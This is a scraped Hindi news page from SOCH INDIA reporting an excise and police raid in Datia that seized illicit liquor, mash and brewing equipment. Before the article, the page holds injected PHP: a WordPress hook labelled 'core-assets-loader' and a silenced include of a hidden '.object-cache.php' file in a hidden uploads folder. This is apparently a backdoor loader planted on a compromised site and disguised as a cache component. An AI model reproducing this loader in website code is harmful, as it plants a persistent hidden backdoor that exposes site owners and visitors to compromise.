add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); दतिया: प्लास्टिक के ड्रमों में छिपा रखी थी लाखों की शराब, आबकारी और पुलिस की संयुक्त टीम ने दबिश देकर की जब्त – SOCH INDIA
Menu

दतिया: प्लास्टिक के ड्रमों में छिपा रखी थी लाखों की शराब, आबकारी और पुलिस की संयुक्त टीम ने दबिश देकर की जब्त

nobanner

विस्तार

जिला आबकारी अधिकारी केएल भगोरा ने बताया कि थरेट थाना पुलिस और आबकारी विभाग की संयुक्त टीम ने थरेट कछुआ के अंतर्गत आने वाले गांव चिना बम्बा कंजर डेरा पर दबिश दी। दबिश के दौरान टीम ने मौके से 62 ड्रमों से लगभग 12 हज़ार 2 सौ किलोग्राम लहान जब्त कर नष्ट किया। इसी के साथ 6 सौ बल्क लीटर शराब और शराब बनाने के उपकरण बरामद किए गए हैं। शराब व शराब बनाने के उपकरण की कुल अनुमानित कीमत सात लाख 77 हज़ार रुपए आंकी गई है।

आबकारी और पुलिस विभाग की संयुक्त टीम का दस्ता देख आरोपी मौके से भाग निकले। इस पर आबकारी विभाग ने आबकारी एक्ट के तहत धारा 34(1) तीन प्रकरण और धारा 34(2) का एक प्रकरण दर्ज कर विवेचना में लिया है।